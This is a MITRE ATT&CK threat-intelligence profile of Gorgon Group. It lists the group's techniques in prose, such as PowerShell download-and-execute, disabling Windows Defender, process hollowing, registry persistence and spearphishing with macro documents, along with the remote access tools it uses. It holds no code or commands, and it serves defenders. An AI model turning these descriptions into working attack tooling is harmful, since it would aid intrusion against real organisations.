Register to stream ATT&CKcon 2.0 October 29-30

Gorgon Group

Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [1]

ID: G0078
Version: 1.2

Techniques Used

Domain ID Name Use
Enterprise T1059 Command-Line Interface Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system. [1]
Enterprise T1140 Deobfuscate/Decode Files or Information Gorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file. [1]
Enterprise T1089 Disabling Security Tools Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command. [1]
Enterprise T1106 Execution through API Gorgon Group malware can leverage the Windows API call, CreateProcessA(), for execution. [1]
Enterprise T1112 Modify Registry Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\Software\Microsoft\Office\. [1]
Enterprise T1086 PowerShell Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine. [1]
Enterprise T1093 Process Hollowing Gorgon Group malware can use process hollowing to inject one of its trojans into another process. [1]
Enterprise T1055 Process Injection Gorgon Group malware can download a remote access tool, ShiftyBug, and inject into another process. [1]
Enterprise T1060 Registry Run Keys / Startup Folder Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence. [1]
Enterprise T1105 Remote File Copy Gorgon Group malware can download additional files from C2 servers. [1]
Enterprise T1064 Scripting Gorgon Group has used macros in Spearphishing Attachments as well as executed VBScripts on victim machines. [1]
Enterprise T1023 Shortcut Modification Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence. [1]
Enterprise T1193 Spearphishing Attachment Gorgon Group sent emails to victims with malicious Microsoft Office documents attached. [1]
Enterprise T1065 Uncommonly Used Port Gorgon Group has used a variant of ShiftyBug that communicates with its C2 server over port 6666. [1]
Enterprise T1204 User Execution Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails. [1]

Software

ID Name References Techniques
S0336 NanoCore [1] Audio Capture, Command-Line Interface, Disabling Security Tools, Input Capture, Modify Registry, Obfuscated Files or Information, Registry Run Keys / Startup Folder, Remote File Copy, Scripting, Standard Cryptographic Protocol, System Network Configuration Discovery, Uncommonly Used Port, Video Capture
S0385 njRAT [1] Application Window Discovery, Command-Line Interface, Custom Command and Control Protocol, Data Encoding, Data from Local System, Disabling Security Tools, File and Directory Discovery, File Deletion, Input Capture, Modify Registry, Peripheral Device Discovery, Registry Run Keys / Startup Folder, Remote Desktop Protocol, Remote File Copy, Remote System Discovery, Replication Through Removable Media, Screen Capture, System Information Discovery, System Owner/User Discovery, Uncommonly Used Port, Video Capture
S0262 QuasarRAT [1] Code Signing, Command-Line Interface, Connection Proxy, Credential Dumping, Credentials in Files, Input Capture, Masquerading, Modify Registry, Remote Desktop Protocol, Remote File Copy, Scheduled Task, Standard Cryptographic Protocol, System Information Discovery, Video Capture
S0332 Remcos [1] Audio Capture, Bypass User Account Control, Clipboard Data, Command-Line Interface, Connection Proxy, File and Directory Discovery, Input Capture, Modify Registry, Obfuscated Files or Information, Process Injection, Registry Run Keys / Startup Folder, Remote File Copy, Screen Capture, Scripting, Video Capture, Virtualization/Sandbox Evasion

References